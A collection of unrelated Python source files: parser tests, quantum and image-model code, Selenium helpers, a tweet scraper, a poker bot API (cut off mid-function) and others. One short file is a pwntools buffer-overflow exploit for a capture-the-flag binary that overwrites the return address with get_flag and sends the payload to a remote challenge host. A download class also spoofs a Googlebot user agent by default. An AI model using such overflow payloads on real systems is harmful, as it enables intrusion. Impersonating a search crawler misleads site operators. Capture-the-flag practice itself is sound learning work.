self.assertEqual(elem.target.content(), "'parser/border.dart'")
elem = parser.parse("part of 'parser/border.dart';", 0)
self.assertEqual(elem.content(), "part of 'parser/border.dart';")
self.assertEqual(elem.target.content(), "'parser/border.dart'")
elem = parser.parse("part \"parser/border.dart\";", 0)
self.assertEqual(elem.content(), "part \"parser/border.dart\";")
self.assertEqual(elem.target.content(), "\"parser/border.dart\"")
elem = parser.parse("part of \"parser/border.dart\";", 0)
self.assertEqual(elem.content(), "part of \"parser/border.dart\";")
self.assertEqual(elem.target.content(), "\"parser/border.dart\"")
if __name__ == "__main__":
unittest.main()
|
from pwn import *
io = remote('redirect.do-not-trust.hacking.run', 10356)
e = ELF('pwn1_sctf_2016')
address = e.symbols['get_flag']
log.success('get_flag_address => %s' % hex(address).upper())
payload = b'I'*20 + b'a'*0x4 + p32(address)
# payload = b'I'*20 + b'a'*0x4 + p32(0x8048F0D)
io.sendline(payload)
io.interactive()
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from nisqai.measure import MeasurementOutcome
from numpy import array
from pyquil import get_qc
from pyquil.api import QuantumComputer
# TODO: This should be updated to something like
# from nisqai.trainer import this_optimization_method
# for now this is just for simplicity
# from scipy.optimize import minimize
from nisqai.optimize import minimize
class Network:
"""Network class."""
def __init__(self, layers, computer, predictor=None):
"""Initializes a network with the input layers.
Args:
layers : iterable
Iterable object of network elements.
Examples:
layers = [DenseAngleEncoding, ProductAnsatz, Measurement]
leads to a network of the form
----[State Prep]----[Gate]----[Measure]----
Network elements must be in a valid ordering to create a network.
Criteria:
(1) Must start with an encoding ansatz.
(2) Must end with a measurement ansatz.
(3) Any number of unitary ansatze can be implemented in between.
(4) If network continues after measurement, an encoding ansatz
must follow a measurement ansatz.
computer : Union[str, pyquil.api.QuantumComputer]
Specifies which computer to run the network on.
Examples:
"Aspen-1-2Q-B"
"1q-qvm"
"5q-qvm"
predictor : Callable
Function that inputs a bit string and outputs a label
(i.e., either 0 or 1) representing the class.
"""
# TODO: check if ordering of layers is valid
# Store the layers and individual elements
# TODO: are both needed? which is better?
self._layers = layers
self._encoder = layers[0]
self._ansatz = layers[1]
self._measurement = layers[2]
# Store the computer backend
if type(computer) == str:
self.computer = get_qc(computer)
elif type(computer) == QuantumComputer:
self.computer = computer
else:
raise TypeError
# Number of data points
self.num_data_points = self._encoder.data.num_samples
# TODO: Make sure the predictor function is valid (returns 0 or 1)
self.predictor = predictor
@property
def data(self):
"""Returns the LabeledCData object of the network's encoder."""
return self._encoder.data
def _build(self, data_ind):
"""Builds the network as a sequence of quantum circuits."""
# TODO: what about multicircuit networks?
# note 2/4/19: I think this could be handled with another class
# Grab the initial encoder circuit for the given index
circuit = self._encoder[data_ind]
# Add all other layers
# TODO: allow self.layers to take sublists
# for example, [encoder, [layer1, layer2, layer3, ...], measure]
# this could make it easier to build networks using, say, list comprehensions
for ii in range(1, len(self._layers)):
circuit += self._layers[ii]
# Order the given circuit and return it
circuit.order()
return circuit
def compile(self, index, shots):
"""Returns the compiled program for the data point
indicated by the index.
Args:
index : int
Index of data point.
shots : int
Number of times to run the circuit.
"""
# Get the right program to compile. Note type(program) == BaseAnsatz.
program = self._build(index)
# Compile the program to the appropriate computer
return program.compile(self.computer, shots)
def propagate(self, index, angles=None, shots=1000):
"""Runs the network (propagates a data point) and returns the circuit result.
Args:
index : int
Specifies the index of the data point to propagate.
angles : Union[dict, list]
Angles for the unitary ansatz.
shots : int
Number of times to execute the circuit.
"""
# Get the compiled executable instructions
executable = self.compile(index, shots)
# Use the memory map from the ansatz parameters
if angles is None:
mem_map = self._ansatz.params.memory_map()
else:
mem_map = self._ansatz.params.update_values_memory_map(angles)
# Run the program and store the raw results
output = self.computer.run(executable, memory_map=mem_map)
# Return a MeasurementOutcome of the results
return MeasurementOutcome(output)
def predict(self, index, angles=None, shots=1000):
"""Returns the prediction of the data point corresponding to the index.
Args:
index : int
Specifies the index of the data point to get a prediction of.
angles : Union[dict, list]
Angles for the unitary ansatz.
shots : int
Number of times to execute the circuit.
"""
# Propagate the network to get the outcome
output = self.propagate(index, angles, shots)
# Use the predictor function to get the prediction from the output
# TODO: NOTE: This is not compatible with classical costs such as cross entropy.
prediction = self.predictor(output)
# Return the prediction
return prediction
def predict_all(self, angles=None, shots=1000):
"""Returns predictions for all data points.
Args:
            angles : Union[dict, list]
Angles for the unitary ansatz.
shots : int
Number of times to execute the circuit for one prediction.
"""
# Propagate the network to get the outcomes
return array([self.predict(ii, angles, shots) for ii in range(self.num_data_points)])
def cost_of_point(self, index, angles=None, shots=1000):
"""Returns the cost of a particular data point.
Args:
index : int
Specifies the data point.
angles : Union(dict, list)
Angles for the unitary ansatz.
shots : int
Number of times to execute the circuit.
"""
# Get the network's prediction of the data point
prediction = self.predict(index, angles, shots)
# Get the actual label of the data point
label = self._encoder.data.labels[index]
# TODO: Generalize to arbitrary cost functions.
# Input a cost function into the Network, then use this.
return int(prediction != label)
def cost(self, angles, shots=1000):
"""Returns the total cost of the network at the given angles.
Args:
angles : Union(dict, list)
Angles for the unitary ansatz.
shots : int
Number of times to execute the circuit.
Returns : float
Total cost of the network.
"""
# Variable to store the cost
val = 0.0
# Add the cost for each data point
for ii in range(self.num_data_points):
val += self.cost_of_point(ii, angles, shots)
# Return the total normalized cost
return val / self.num_data_points
def train(self, initial_angles, trainer="COBYLA", updates=False, shots=1000, **kwargs):
"""Adjusts the parameters in the Network to minimize the cost.
Args:
initial_angles : Union[dict, list]
trainer : callable
Optimization function used to minimize the cost.
Defaults to "COBYLA"
updates : bool (default: False)
If True, cost value at each iteration is printed to the console.
shots : int (default: 1000)
Number of times to run a single circuit.
kwargs:
Keyword arguments sent into the `options` argument in the
nisqai.optimize.minimize method. For example:
>>> Network.train(initial_angles, trainer="Powell", maxfev=100)
will call
>>> nisqai.optimize.minimize(cost, initial_angles,
>>> method="Powell", options=dict(maxfev=100))
This is consistent with how scipy.optimize.minimize is formatted.
"""
# Define the objective function
def obj(angles):
val = self.cost(angles=angles, shots=shots)
if updates:
print("Current cost: %0.2f" % val)
return val
# Call the trainer
res = minimize(obj, initial_angles, method=trainer, options=kwargs)
# TODO: Define a NISQAI standard output for trainer results
return res
def __getitem__(self, index):
"""Returns the network with state preparation for the data
point indicated by item.
Args:
index : int
Index of data point.
"""
return self._build(index)
def __str__(self):
"""Returns the circuit for the zeroth data point."""
# TODO: return a text drawing of the network
        return str(self[0])
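# Illustrative usage sketch (added comment, not part of the original module; `encoder`,
# `ansatz`, `measurement`, and `nearest_label_predictor` are hypothetical objects, and a
# scipy-style result with an `x` attribute is assumed from the trainer):
# net = Network([encoder, ansatz, measurement], "2q-qvm", predictor=nearest_label_predictor)
# res = net.train(initial_angles=[0.1, 0.2], trainer="COBYLA", shots=500)
# predictions = net.predict_all(angles=res.x)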
|
from selenium.webdriver.common.by import (
By
)
from selenium.webdriver.support import (
expected_conditions as EC
)
from selenium.webdriver.support.ui import (
WebDriverWait
)
def get_element_by_css_selector(driver, tag, value):
    ''' Get a specified element by tag and CSS class name.
'''
is_located = WebDriverWait(driver, 4).until(
EC.visibility_of_element_located((By.CSS_SELECTOR, f'{tag}.{value}'))
)
if is_located:
return driver.find_element(By.CSS_SELECTOR, f'{tag}.{value}')
def get_element_by_id(driver, id):
''' Get a specified element by id.
Wait until the element is visible.
'''
is_located = WebDriverWait(driver, 4).until(
EC.visibility_of_element_located((By.ID, id))
)
if is_located:
return driver.find_element(By.ID, id)
def get_element_by_id_clickable(driver, id):
''' Get elements by id.
'''
is_located = WebDriverWait(driver, 4).until(
EC.element_to_be_clickable((By.ID, id))
)
if is_located:
return driver.find_element(By.ID, id)
def get_element_by_id_ext(driver, id):
''' Get a specified element by id.
Wait until the element is visible.
'''
is_located = WebDriverWait(driver, 10).until(
EC.visibility_of_element_located((By.ID, id))
)
if is_located:
return driver.find_element(By.ID, id)
def get_element_by_tag(driver, tag):
''' Get a specified element by tag.
Wait until the element is visible.
'''
is_located = WebDriverWait(driver, 4).until(
EC.visibility_of_element_located((By.TAG_NAME, tag))
)
if is_located:
return driver.find_element(By.TAG_NAME, tag)
def get_element_by_tag_and_text(driver, tag, text):
''' Get a specified element by tag and text.
Wait until the element is visible.
'''
is_located = WebDriverWait(driver, 4).until(
EC.text_to_be_present_in_element((By.TAG_NAME, tag), text)
)
if is_located:
return driver.find_element(By.TAG_NAME, tag)
def get_element_by_xpath(driver, xpath):
''' Get element by xpath.
'''
is_located = WebDriverWait(driver, 4).until(
EC.presence_of_element_located((By.XPATH, f'{xpath}'))
)
if is_located:
return driver.find_element(By.XPATH, f'{xpath}')
def get_element_by_xpath_clickable(driver, xpath):
''' Get element by xpath.
'''
is_located = WebDriverWait(driver, 4).until(
EC.element_to_be_clickable((By.XPATH, f'{xpath}'))
)
if is_located:
return driver.find_element(By.XPATH, f'{xpath}')
def get_element_by_xpath_visible(driver, xpath):
''' Get element by xpath.
'''
is_located = WebDriverWait(driver, 4).until(
EC.visibility_of_element_located((By.XPATH, f'{xpath}'))
)
if is_located:
return driver.find_element(By.XPATH, f'{xpath}')
def get_elements_by_css_selector(driver, selector):
''' Get elements by css selector.
'''
is_located = WebDriverWait(driver, 4).until(
EC.presence_of_all_elements_located((By.CSS_SELECTOR, f'{selector}'))
)
if is_located:
return driver.find_elements(By.CSS_SELECTOR, f'{selector}')
def get_elements_by_tag(driver, tag):
''' Get all elements by tag.
Wait until the elements are visible.
'''
is_located = WebDriverWait(driver, 4).until(
EC.visibility_of_element_located((By.TAG_NAME, tag))
)
if is_located:
return driver.find_elements(By.TAG_NAME, tag)
def get_elements_by_tag_ext(driver, tag):
''' Get all elements by tag.
Wait until the elements are visible.
'''
is_located = WebDriverWait(driver, 10).until(
EC.visibility_of_element_located((By.TAG_NAME, tag))
)
if is_located:
return driver.find_elements(By.TAG_NAME, tag)
def get_elements_by_xpath(driver, xpath):
''' Get elements by xpath.
'''
is_located = WebDriverWait(driver, 4).until(
EC.presence_of_all_elements_located((By.XPATH, f'{xpath}'))
)
if is_located:
return driver.find_elements(By.XPATH, f'{xpath}')
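# Illustrative usage sketch (added comment, not part of the original module; `driver` is
# assumed to be an already-configured selenium WebDriver, and the ids/selectors are
# hypothetical):
# submit_button = get_element_by_id_clickable(driver, 'submit')
# submit_button.click()
# rows = get_elements_by_css_selector(driver, 'table.results tr')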
|
from pathlib import Path
from time import time
from logging import getLogger, FileHandler, Formatter
from cliar import Cliar
class BaseCli(Cliar):
'''Base CLI. All CLI extensions must inherit from this one.'''
def __init__(self, logs_dir=None):
super().__init__()
self.logger = getLogger('flt')
for old_handler in self.logger.handlers:
if isinstance(old_handler, FileHandler):
self.logger.removeHandler(old_handler)
filename = f'{int(time())}.log'
if logs_dir:
logs_dir_path = Path(logs_dir).resolve()
logs_dir_path.mkdir(parents=True, exist_ok=True)
filename = f'{logs_dir_path / filename}'
handler = FileHandler(filename, delay=True)
handler.setFormatter(Formatter('%(asctime)s | %(name)20s | %(levelname)8s | %(message)s'))
self.logger.addHandler(handler)
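# Illustrative usage sketch (added comment, not part of the original module; `ProjectCli`
# and its command are hypothetical, and dispatch via parse() follows the cliar convention):
# class ProjectCli(BaseCli):
#     def build(self, target: str):
#         self.logger.info('building %s', target)
# ProjectCli(logs_dir='logs').parse()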
|
from backend.settings import *
from testing_platform.settings import LOGGER
from testing_platform.settings import FILE_REPO
|
#! /usr/bin/python
# -*- coding: utf-8 -*-
from jinja2 import Environment, FileSystemLoader
import ConfigParser
import os
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
template_dir = './templates'
output_dir = './output/'
config_file = "config"
class Config(object):
# def __init__(self, values):
# self.values = 0
def load_config(self, app_name='ibase'):
cf = ConfigParser.ConfigParser()
cf.read(config_file)
return cf.items(app_name)
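# Illustrative sketch (added comment, not part of the original module; the keys and values
# are hypothetical): load_config('ibase') returns the key/value pairs of the [ibase]
# section of the local "config" file as a list of tuples, e.g. a file containing
#   [ibase]
#   host = 127.0.0.1
#   port = 8080
# would yield [('host', '127.0.0.1'), ('port', '8080')].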
if __name__ == '__main__':
config = Config()
config.load_config('ibase')
|
from typing import Callable
from typing import Union
from typer import Typer
def add(app: Typer, name: str, item: Union[Callable, Typer], **kwargs):
if isinstance(item, Typer):
app.add_typer(item, name=name, **kwargs)
else:
app.command(name, **kwargs)(item)
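# Illustrative usage sketch (added comment, not part of the original module; `list_items`
# and `admin_app` are hypothetical):
# app = Typer()
# add(app, "list", list_items)   # registers a plain command
# add(app, "admin", admin_app)   # mounts a sub-Typer application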
|
#!/usr/bin/env python
import cv2
import dlib
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from ros_face_recognition.srv import Face
import config
import face_api
_service = "/{}/faces".format(config.topic_name)
class ImageReader:
def __init__(self):
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/camera/rgb/image_raw", Image, self.process)
def process(self, data):
try:
image = self.bridge.imgmsg_to_cv2(data, "bgr8")
image_h, image_w = image.shape[:2]
rospy.wait_for_service(_service)
try:
faces = rospy.ServiceProxy(_service, Face)
resp1 = faces()
faces = resp1.faces
for f in faces:
rect = dlib.rectangle(
int(f.x * image_w),
int(f.y * image_h),
int((f.x + f.w) * image_w),
int((f.y + f.h) * image_h),
)
face = face_api.Face(rect)
face.details["id"] = f.label
face.details["name"] = f.name
face.details["gender"] = f.gender
face.draw_face(image)
except rospy.ServiceException, e:
print "Service call failed: %s" % e
cv2.imshow("image", image)
key = cv2.waitKey(1) & 0xFF
if key == ord('q'):
cv2.destroyAllWindows()
rospy.signal_shutdown("q key pressed")
elif key == ord('s'):
cv2.imwrite("output.jpg", image)
except CvBridgeError as e:
rospy.logerr(e)
def main():
rospy.init_node(config.topic_name, anonymous=True)
rospy.loginfo("Listening to images reader")
ImageReader()
try:
rospy.spin()
except KeyboardInterrupt:
rospy.logwarn("Shutting done ...")
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
from requests_futures.sessions import FuturesSession
import hashlib
import time
import copy
from datetime import timedelta
from zipfile import ZipFile
from tempfile import NamedTemporaryFile
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
import os
logger = logging.getLogger('download.FuturesSessionFlex')
class FuturesSessionFlex(FuturesSession):
BLOCKSIZE = 65536
SUFFIXES = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']
def __init__(self, max_workers=1, user_agent='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', *args, **kwargs):
kwargs.update({'max_workers':max_workers})
super(FuturesSessionFlex, self).__init__(*args, **kwargs)
self.__sessions={}
self.__sessions_keys=[]
self.__fs_kwargs={}
self.__fs_kwargs.update(kwargs)
_adapter_kwargs = {'pool_connections': max_workers,'pool_maxsize': max_workers,'pool_block':True}
self.mount('https://', HTTPAdapter(**_adapter_kwargs))
self.mount('http://', HTTPAdapter(**_adapter_kwargs))
if self.headers is None:
self.headers={}
self.headers.update({'User-Agent': user_agent})
def map(self,pattern='http://',session=None):
        ''' If called with session=None, the default session from the constructor is used. '''
kwargs = copy.deepcopy(self.__fs_kwargs)
kwargs['session']=session
if not pattern in self.__sessions: self.__sessions_keys.append(pattern)
self.__sessions[pattern]=FuturesSessionFlex(*(), **kwargs)
self.__sessions_keys=sorted(self.__sessions_keys, key=len, reverse=True)
def set_headers(self,headers):
self.headers.update(headers)
@staticmethod
def h_size(nbytes):
i = 0
while nbytes >= 1024 and i < len(FuturesSessionFlex.SUFFIXES)-1:
nbytes /= 1024.
i += 1
f = ('%.2f' % nbytes).rstrip('0').rstrip('.')
return '%s %s' % (f, FuturesSessionFlex.SUFFIXES[i])
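    # Illustrative worked example (added comment, not part of the original module):
    # h_size(1536) -> '1.5 KB' and h_size(1048576) -> '1 MB'; trailing zeros and the
    # decimal point are stripped before the suffix is appended.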
@staticmethod
def add_size(session, response):
if 'Content-Length' in response.headers:
response.size=int(response.headers.get('Content-Length',0))
else:
            logger.warning("Content-Length Header not provided by %s"%response.url)
response.size=len(response.content)
response.h_size=FuturesSessionFlex.h_size(response.size)
@staticmethod
def add_hash(session, response):
response.hash=None
if response.ok:
ts = str(time.time())
cv = response.headers.get('Last-Modified',ts)+response.headers.get('ETag',ts)
response.hash=hashlib.sha1(str(cv).encode('UTF-8')).hexdigest()
@staticmethod
def extract_jar(session, response):
if response.ok:
start = time.time()
FuturesSessionFlex.add_size(session, response)
response.index=NamedTemporaryFile()
with NamedTemporaryFile() as f:
for chunk in response.iter_content(chunk_size=FuturesSessionFlex.BLOCKSIZE):
if chunk: f.write(chunk)
zip_file = ZipFile(f)
idxfile = 'index-v1.json' if 'index-v1.json' in zip_file.namelist() else 'index.xml'
with zip_file.open(idxfile) as file:
while True:
byte = file.read(FuturesSessionFlex.BLOCKSIZE)
if not byte: break
response.index.write(byte)
logging.debug("%s - %s - (%s)"%(response.index.name,response.url,FuturesSessionFlex.h_size(os.stat(response.index.name).st_size)))
elapsed = time.time() - start
response.elapsed+=timedelta(seconds=elapsed)
def __lookup_fs_session(self,url):
# fast direct matches
if url in self.__sessions:
return self.__sessions[url]
# slower pattern search depends on pattern count and size
for k in self.__sessions_keys:
if url.find(k) == 0:
return self.__sessions[k]
return None
def request(self, *args, **kwargs):
session = self.__lookup_fs_session(args[1])
if not session is None:
return session.request(*args, **kwargs)
return super(FuturesSessionFlex, self).request(*args, **kwargs)
def close(self):
for key, session in self.__sessions.items():
session.close()
        super(FuturesSessionFlex, self).close()
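# Illustrative usage sketch (added comment, not part of the original module; the URLs are
# placeholders): requests whose URL starts with a mapped prefix are routed to a dedicated
# sub-session, everything else uses the default session.
# fs = FuturesSessionFlex(max_workers=4)
# fs.map('https://mirror.example.org/')
# response = fs.get('https://mirror.example.org/repo/index.jar').result()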
|
import subprocess
import os
import glob
from multiprocessing import Process
import logging
import time
from datetime import datetime
import twint as tw
print('Initialising twint config')
#tc.Output = f'tw-{datetime.now().strftime("%Y%m%d-%H%M%S")}-newsoutlets.csv' # Set filename to include current date/time
NEWSOUTLETS = ['nytimes', 'CNN', 'BBC', 'MSNBC', 'NPR', 'FoxNews', 'WSJ']
DPATH = os.getcwd() + '/data' # Equates to ./data
# Checks if the directory for a user exists in /data and creates if not
def check_dir_exists(name):
try:
os.makedirs(os.path.join(DPATH, name)) # Create directory in ./data
print(f'> Created directory in /data for {name}')
except FileExistsError: # Folder already exists
pass
# Finds the latest created file and obtains/returns datetime from filename
def get_last_scraped(username):
# Get all csv files in data/username directory
list_of_files = glob.iglob(f'{os.path.join(DPATH, username)}/*.csv')
# Get latest created file
try:
latest_scraped = max(list_of_files, key=os.path.getctime)
filename = latest_scraped.rsplit('\\', 1)[1] # Split to get filename
dstring = filename.split('.', 1)[0] # Split to get rid of .csv
# Convert strftime to datetime
last_date_time = datetime.strptime(dstring, '%Y%m%d-%H%M%S')
return str(last_date_time)
except ValueError:
pass
# Searches and extracts tweets for a given user
def scrape_tweets(tc, username):
check_dir_exists(username)
current_time = datetime.now()
tc.Output = os.path.join(DPATH, username,
current_time.strftime("%Y%m%d-%H%M%S")) + '.csv'
tc.Store_csv = True
# Set Since option to only scrape since last scraped
last_scraped = get_last_scraped(username)
# Check if there was a last time, if not don't set a Since
if last_scraped is not None:
tc.Since = get_last_scraped(username)
tc.Username = username
print(f'> Searching tweets by the user {username}')
tw.run.Search(tc)
print(f'> Search under {username} complete. Adding data to database')
insert_data(tc.Output)
# Adds objects to database using mongoimport from a given CSV file
def insert_data(filename):
# Run mongoimport tool to import data to database
list_files = subprocess.run(['mongoimport.exe', '-dtest', '-ctest',
'--headerline', '--type=csv', filename],
shell=True)
if __name__ == '__main__':
processes = []
t = tw.Config()
# Create processes for each news outlet and assign them
# to scrape_tweets function
for i in range(len(NEWSOUTLETS)):
t = tw.Config()
p = Process(target=scrape_tweets, args=(t, NEWSOUTLETS[i]))
p.start() # Start process (scrape_tweets(tc, {username}))
processes.append(p) # Append process to list of processes
for p in processes:
p.join()
# list_files = subprocess.run(['mongoimport.exe', '-dtest', '-ctest',
# '--headerline', '--type=csv', 'data.csv'],
# shell=True)
# print("The exit code was: %d" % list_files.returncode)
|
def insertionsort(arr, high):
if high<=1:
return arr
insertionsort(arr, high-1)
last=arr[high-1]
j=high-2
while j>=0 and arr[j]>last:
arr[j+1]=arr[j]
j-=1
arr[j+1]=last
if __name__=='__main__':
'''
arr=input('Enter elements: ')
arr=arr.split()
'''
arr=[10, 12, 9, 5, 8, 15, 13]
n=len(arr)
insertionsort(arr, n)
print('Sorted array: ')
for i in range(n):
print(arr[i])
|
#!/usr/bin/env python
# my own module
import os, sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))
from utilities.helpers import get_git_root
from torchvision import datasets, models, transforms
from utilities.e2wrn import wrn16_8_stl_d8d4d1
import pandas as pd
import torch
# GPU or CPU as a global variable
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
class trained_model_prediction:
'''
This class applies trained models to predict class labels of images in the validation sample.
'''
def __init__(self, model_name, data_dir, img_resize=96):
'''
In the constructor the dataloader is constructed.
'''
# store the model name
self.model_name = model_name
# Data augmentation and normalization for training and validation
data_transforms = {
'train': transforms.Compose([
transforms.Resize(img_resize),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.Resize(img_resize),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
self.image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']}
        # Since I have to match predicted labels with filenames, I have to use batch_size 1 and shuffle False. Otherwise I would have to write my own DataLoader.
# ref: https://stackoverflow.com/questions/56699048/how-to-get-the-filename-of-a-sample-from-a-dataloader
self.dataloaders = {x: torch.utils.data.DataLoader(self.image_datasets[x], batch_size=1, shuffle=False, num_workers=4) for x in ['train', 'val']}
def load_trained_model(self, trained_model):
self.model = trained_model
self.model.eval()
def make_output_df(self, overwrite=False):
'''
Make and return a dataframe for model predictions.
'''
if (not os.path.exists(self.outfpn)) or overwrite:
data_dict = dict()
data_dict['filename'] = []
data_dict['true_original_label'] = []
data_dict['true_pytorch_label'] = []
for fpn, label in self.image_datasets['val'].imgs:
data_dict['filename'].append(os.path.basename(fpn))
data_dict['true_original_label'].append(os.path.dirname(fpn).split('/')[-1])
data_dict['true_pytorch_label'].append(label)
df_prediction = pd.DataFrame(data_dict)
else:
df_prediction = pd.read_csv(self.outfpn)
return df_prediction
def predict_save(self, outfpn, overwrite=False):
'''
Predict class labels and save to file.
If outfpn exists already, load the data into a dataframe and add new data to it.
'''
# prediction container
data_dict = dict()
data_dict['filename'] = []
pred_colname = self.model_name+'_label'
data_dict[pred_colname] = []
# Iterate over data.
for i, (images, labels) in enumerate(self.dataloaders['val'], 0):
images = images.to(device)
labels = labels.to(device)
with torch.set_grad_enabled(False):
outputs = self.model(images)
_, preds = torch.max(outputs, 1)
data_dict[pred_colname].extend(preds.tolist())
sample_fname, _ = self.dataloaders['val'].dataset.samples[i]
data_dict['filename'].append(os.path.basename(sample_fname))
# prepare output dataframe
self.outfpn = outfpn
self.df_prediction = self.make_output_df(overwrite=overwrite)
# self.df_prediction.set_index('filename', inplace=True)
self.df_prediction = self.df_prediction.merge(pd.DataFrame(data_dict), on='filename', how='left')
# save to file
outdir = os.path.dirname(outfpn)
if not os.path.exists(outdir):
os.makedirs(outdir)
self.df_prediction.to_csv(outfpn, index=False)
def prepare_base_model(model_fpn, image_datasets):
'''
The base model is the wide resnet provided by pytorch.
Adapt the number of classes to my data.
'''
model_ft = models.wide_resnet50_2()
num_ftrs = model_ft.fc.in_features
# Here the size of each output sample is set to len(class_names).
class_names = image_datasets['train'].classes
model_ft.fc = torch.nn.Linear(num_ftrs, len(class_names))
model_ft = model_ft.to(device)
model_ft.load_state_dict(torch.load(model_fpn))
return model_ft
if __name__ == '__main__':
# the data directory
data_dir = os.path.join(get_git_root(__file__), 'data/imagefolder-jpeg-224x224')
# load base model
base_model_prediction = trained_model_prediction('wide_resnet50_2', data_dir, 224)
base_model_pathname = os.path.join(get_git_root(__file__), 'model_weights/224x224/wide_resnet_no_augmentation.pt')
base_model = prepare_base_model(base_model_pathname, base_model_prediction.image_datasets)
base_model_prediction.load_trained_model(base_model)
    base_model_prediction.predict_save('processed_data/predictions.csv', overwrite=True)
# load e2cnn model
e2cnn_model_prediction = trained_model_prediction('wrn16_8_stl_d8d4d1', data_dir, 96)
e2cnn_model_pathname = os.path.join(get_git_root(__file__), 'model_weights/96x96/wrn16_8_stl_d8d4d1_lr1.0e-05_sgd_epoch90.pt')
e2cnn_model = wrn16_8_stl_d8d4d1(num_classes=len(base_model_prediction.image_datasets['train'].classes))
e2cnn_model = e2cnn_model.to(device)
e2cnn_model.load_state_dict(torch.load(e2cnn_model_pathname))
e2cnn_model_prediction.load_trained_model(e2cnn_model)
e2cnn_model_prediction.predict_save('processed_data/predictions.csv')
|
import os
import copy
import json
import logging
import pymongo
import numpy as np
from torch import set_grad_enabled
from torch import load
from torch import device as D
from pymongo import MongoClient
from collections import defaultdict
from flask import Flask, jsonify, request
from flask_cors import CORS
from poker_env.env import Poker,flatten
import poker_env.datatypes as pdt
from poker_env.config import Config
from models.model_utils import norm_frequencies
from models.networks import OmahaActor,OmahaObsQCritic
"""
API for connecting the Poker Env with Alex's frontend client for baseline testing the trained bot.
"""
class API(object):
def __init__(self):
self.increment_position = {'SB':'BB','BB':'SB'}
self.seed = 1458
self.connect()
self.game_object = pdt.Globals.GameTypeDict[pdt.GameTypes.OMAHAHI]
self.config = Config()
self.env_params = {
'game':pdt.GameTypes.OMAHAHI,
'betsizes': self.game_object.rule_params['betsizes'],
'bet_type': self.game_object.rule_params['bettype'],
'n_players': 2,
'pot':self.game_object.state_params['pot'],
'stacksize': self.game_object.state_params['stacksize'],
'cards_per_player': self.game_object.state_params['cards_per_player'],
'starting_street': self.game_object.starting_street,
'global_mapping':self.config.global_mapping,
'state_mapping':self.config.state_mapping,
'obs_mapping':self.config.obs_mapping,
'shuffle':True
}
self.env = Poker(self.env_params)
self.network_params = self.instantiate_network_params()
self.actor = OmahaActor(self.seed,self.env.state_space,self.env.action_space,self.env.betsize_space,self.network_params)
self.critic = OmahaObsQCritic(self.seed,self.env.state_space,self.env.action_space,self.env.betsize_space,self.network_params)
self.load_model(self.actor,self.config.production_actor)
self.load_model(self.critic,self.config.production_critic)
self.player = {'name':None,'position':'BB'}
self.reset_trajectories()
def reset_trajectories(self):
self.trajectories = defaultdict(lambda:[])
self.trajectory = defaultdict(lambda:{'states':[],'obs':[],'betsize_masks':[],'action_masks':[], 'actions':[],'action_category':[],'action_probs':[],'action_prob':[],'betsize':[],'rewards':[],'value':[]})
def instantiate_network_params(self):
device = 'cpu'
network_params = copy.deepcopy(self.config.network_params)
network_params['maxlen'] = self.config.maxlen
network_params['device'] = device
return network_params
def load_model(self,model,path):
if os.path.isfile(path):
model.load_state_dict(load(path,map_location=D('cpu')))
set_grad_enabled(False)
else:
raise ValueError('File does not exist')
def connect(self):
client = MongoClient('localhost', 27017,maxPoolSize=10000)
self.db = client.baseline
def update_player_name(self,name:str):
"""updates player name"""
self.player['name'] = name
def update_player_position(self,position):
self.player['position'] = position
def insert_model_outputs(self,model_outputs,action_mask):
outputs_json = {
'action':model_outputs['action'],
'action_category':model_outputs['action_category'],
'betsize':model_outputs['betsize'],
'action_prob':model_outputs['action_prob'].detach().numpy().tolist(),
'action_probs':model_outputs['action_probs'].detach().numpy().tolist(),
'value':model_outputs['value'].detach().numpy().tolist(),
'action_mask':action_mask.tolist(),
'player':self.player['name']
}
self.db['bot_data'].insert_one(outputs_json)
def insert_into_db(self,training_data:dict):
"""
stores player data in the player_stats collection.
takes trajectories and inserts them into db for data analysis and learning.
"""
stats_json = {
'game':self.env.game,
'player':self.player['name'],
'reward':training_data[self.player['position']][0]['rewards'][0],
'position':self.player['position'],
}
self.db['player_stats'].insert_one(stats_json)
keys = training_data.keys()
positions = [position for position in keys if position in ['SB','BB']]
for position in positions:
for i,poker_round in enumerate(training_data[position]):
states = poker_round['states']
observations = poker_round['obs']
actions = poker_round['actions']
action_prob = poker_round['action_prob']
action_probs = poker_round['action_probs']
action_categories = poker_round['action_category']
betsize_masks = poker_round['betsize_masks']
action_masks = poker_round['action_masks']
rewards = poker_round['rewards']
betsizes = poker_round['betsize']
values = poker_round['value']
assert(isinstance(rewards,list))
assert(isinstance(actions,list))
assert(isinstance(action_prob,list))
assert(isinstance(action_probs,list))
assert(isinstance(states,list))
assert(isinstance(values,list))
for step,state in enumerate(states):
state_json = {
'game':self.env.game,
'player':self.player['name'],
'poker_round':step,
'state':state.tolist(),
'action_probs':action_probs[step].tolist(),
'action_prob':action_prob[step].tolist(),
'action':actions[step],
'action_category':action_categories[step],
'betsize_mask':betsize_masks[step].tolist(),
'action_mask':action_masks[step].tolist(),
'betsize':betsizes[step],
'reward':rewards[step],
'value':values[step].tolist()
}
self.db['game_data'].insert_one(state_json)
def return_model_outputs(self):
query = {
'player':self.player['name']
}
player_data = self.db['bot_data'].find(query).sort('_id',-1)
action_probs = []
values = []
action_mask = []
for result in player_data:
action_probs.append(np.array(result['action_probs']))
values.append(np.array(result['value']))
action_mask.append(np.array(result['action_mask']))
break
if action_probs:
